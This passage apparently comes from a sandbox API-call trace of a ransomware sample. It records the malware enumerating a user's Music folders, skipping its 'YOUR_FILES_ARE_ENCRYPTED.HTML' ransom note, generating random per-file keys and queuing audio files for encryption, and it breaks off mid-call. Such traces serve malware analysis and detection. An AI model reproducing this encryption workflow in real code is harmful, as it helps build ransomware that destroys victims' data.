wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="39") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="C7") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="57") returned 2 [0167.766] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav" [0167.767] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.767] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 
[0167.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e0f91c0, ftCreationTime.dwHighDateTime=0x1d7da72, ftLastAccessTime.dwLowDateTime=0xf825a360, ftLastAccessTime.dwHighDateTime=0x1d7e5b0, ftLastWriteTime.dwLowDateTime=0xf825a360, ftLastWriteTime.dwHighDateTime=0x1d7e5b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="qeMPPB6d", cAlternateFileName="")) returned 1 [0167.779] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d") returned 38 [0167.779] GetProcessHeap () returned 0x270000 [0167.779] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0167.780] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d" [0167.780] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\*" [0167.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e0f91c0, ftCreationTime.dwHighDateTime=0x1d7da72, ftLastAccessTime.dwLowDateTime=0xf825a360, ftLastAccessTime.dwHighDateTime=0x1d7e5b0, ftLastWriteTime.dwLowDateTime=0xf825a360, ftLastWriteTime.dwHighDateTime=0x1d7e5b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.780] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x6e0f91c0, ftCreationTime.dwHighDateTime=0x1d7da72, ftLastAccessTime.dwLowDateTime=0xf825a360, ftLastAccessTime.dwHighDateTime=0x1d7e5b0, ftLastWriteTime.dwLowDateTime=0xf825a360, ftLastWriteTime.dwHighDateTime=0x1d7e5b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.780] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c6ff0, ftCreationTime.dwHighDateTime=0x1d7dae2, ftLastAccessTime.dwLowDateTime=0x64e7e6b0, ftLastAccessTime.dwHighDateTime=0x1d7df31, ftLastWriteTime.dwLowDateTime=0x64e7e6b0, ftLastWriteTime.dwHighDateTime=0x1d7df31, nFileSizeHigh=0x0, nFileSizeLow=0x17888, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="-klD7FnnV0Wcc3teosZX.m4a", cAlternateFileName="-KLD7F~1.M4A")) returned 1 [0167.780] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a") returned 63 [0167.780] lstrcmpW (lpString1="-klD7FnnV0Wcc3teosZX.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.780] PathFindExtensionW (pszPath="-klD7FnnV0Wcc3teosZX.m4a") returned=".m4a" [0167.781] lstrlenW (lpString=".m4a") returned 4 [0167.781] PathFindExtensionW (pszPath="-klD7FnnV0Wcc3teosZX.m4a") returned=".m4a" [0167.781] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.781] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\-kld7fnnv0wcc3teoszx.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.781] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: 
lpFileSize=0x4ebdb1c*=96392) returned 1 [0167.781] GetProcessHeap () returned 0x270000 [0167.781] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.782] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="4B") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="97") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="30") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="BD") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="83") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="6F") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="7B") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="06") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="11") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="DF") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="66") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="44") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="EC") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="69") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5F") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="1C") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D9") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B9") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: 
param_1="ED") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="67") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B9") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="67") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E6") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="1E") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="55") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="19") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="19") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="71") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E9") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5A") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7F") returned 2 [0167.784] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a" [0167.784] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.784] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.792] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba83d30, ftCreationTime.dwHighDateTime=0x1d7df78, ftLastAccessTime.dwLowDateTime=0x6f3a75e0, 
ftLastAccessTime.dwHighDateTime=0x1d7e5e6, ftLastWriteTime.dwLowDateTime=0x6f3a75e0, ftLastWriteTime.dwHighDateTime=0x1d7e5e6, nFileSizeHigh=0x0, nFileSizeLow=0x1009d, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="cGzXHwX.wav", cAlternateFileName="")) returned 1 [0167.792] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav") returned 50 [0167.792] lstrcmpW (lpString1="cGzXHwX.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.792] PathFindExtensionW (pszPath="cGzXHwX.wav") returned=".wav" [0167.792] lstrlenW (lpString=".wav") returned 4 [0167.793] PathFindExtensionW (pszPath="cGzXHwX.wav") returned=".wav" [0167.793] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\cgzxhwx.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.793] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=65693) returned 1 [0167.793] GetProcessHeap () returned 0x270000 [0167.793] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.794] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="48") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="0C") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="5F") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F6") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="12") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="AE") returned 2 [0167.794] 
wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="A5") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C5") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="12") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="0B") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="71") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="FB") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7B") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="33") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="24") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="B8") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="28") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="09") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="85") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="EE") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="DF") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D7") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="76") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="CD") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="30") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="EE") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="96") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: 
param_1="E2") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C0") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="71") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="1B") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="5E") returned 2 [0167.795] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav" [0167.795] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.795] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.799] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8bfcf70, ftCreationTime.dwHighDateTime=0x1d7de2e, ftLastAccessTime.dwLowDateTime=0x50b96630, ftLastAccessTime.dwHighDateTime=0x1d7de70, ftLastWriteTime.dwLowDateTime=0x50b96630, ftLastWriteTime.dwHighDateTime=0x1d7de70, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="DXCJlNP3q", cAlternateFileName="DXCJLN~1")) returned 1 [0167.803] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q") returned 48 [0167.803] GetProcessHeap () returned 0x270000 [0167.803] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76302f8 [0167.804] lstrcpyW (in: lpString1=0x76302f8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q" [0167.804] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\*" [0167.804] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8bfcf70, ftCreationTime.dwHighDateTime=0x1d7de2e, ftLastAccessTime.dwLowDateTime=0x50b96630, ftLastAccessTime.dwHighDateTime=0x1d7de70, ftLastWriteTime.dwLowDateTime=0x50b96630, ftLastWriteTime.dwHighDateTime=0x1d7de70, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0167.804] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8bfcf70, ftCreationTime.dwHighDateTime=0x1d7de2e, ftLastAccessTime.dwLowDateTime=0x50b96630, ftLastAccessTime.dwHighDateTime=0x1d7de70, ftLastWriteTime.dwLowDateTime=0x50b96630, ftLastWriteTime.dwHighDateTime=0x1d7de70, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.804] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38174810, ftCreationTime.dwHighDateTime=0x1d7dd24, ftLastAccessTime.dwLowDateTime=0xd4993ee0, ftLastAccessTime.dwHighDateTime=0x1d7e3ce, ftLastWriteTime.dwLowDateTime=0xd4993ee0, ftLastWriteTime.dwHighDateTime=0x1d7e3ce, nFileSizeHigh=0x0, nFileSizeLow=0x1709b, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="-ScN6EQhA.mp3", cAlternateFileName="-SCN6E~1.MP3")) returned 1 [0167.804] wnsprintfW (in: pszDest=0x76302f8, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3") returned 62 [0167.804] lstrcmpW (lpString1="-ScN6EQhA.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.804] PathFindExtensionW (pszPath="-ScN6EQhA.mp3") returned=".mp3" [0167.804] lstrlenW (lpString=".mp3") returned 4 [0167.804] PathFindExtensionW (pszPath="-ScN6EQhA.mp3") returned=".mp3" [0167.804] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\-scn6eqha.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0167.805] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=94363) returned 1 [0167.805] GetProcessHeap () returned 0x270000 [0167.805] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.806] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="0B") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="40") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="EC") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="97") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="0B") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="27") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="93") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="A9") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="06") returned 2 
[0167.806] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="2A") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="66") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="8F") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="43") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E3") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="EA") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="32") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F3") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="D4") returned 2 [0167.806] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="C9") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="10") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="F9") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="25") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="14") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="1C") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="72") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="FC") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D3") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="2C") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="98") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="53") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: 
param_1="C0") returned 2 [0167.807] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="63") returned 2 [0167.807] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3" [0167.807] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.807] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.811] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee32080, ftCreationTime.dwHighDateTime=0x1d7d73a, ftLastAccessTime.dwLowDateTime=0x9c127b20, ftLastAccessTime.dwHighDateTime=0x1d7e6cd, ftLastWriteTime.dwLowDateTime=0x9c127b20, ftLastWriteTime.dwHighDateTime=0x1d7e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x5b7f, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="bZOq0vO.mp3", cAlternateFileName="")) returned 1 [0167.815] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3") returned 60 [0167.815] lstrcmpW (lpString1="bZOq0vO.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.815] PathFindExtensionW (pszPath="bZOq0vO.mp3") returned=".mp3" [0167.815] lstrlenW (lpString=".mp3") returned 4 [0167.815] PathFindExtensionW (pszPath="bZOq0vO.mp3") returned=".mp3" [0167.815] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3" (normalized: 
"c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\bzoq0vo.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0167.815] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=23423) returned 1 [0167.815] GetProcessHeap () returned 0x270000 [0167.815] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.816] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="48") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="7D") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="EB") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="E3") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="1F") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="42") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="AD") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="12") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E5") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="7C") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="72") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="68") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="22") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="88") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="7E") returned 2 [0167.816] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CB") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd76a, 
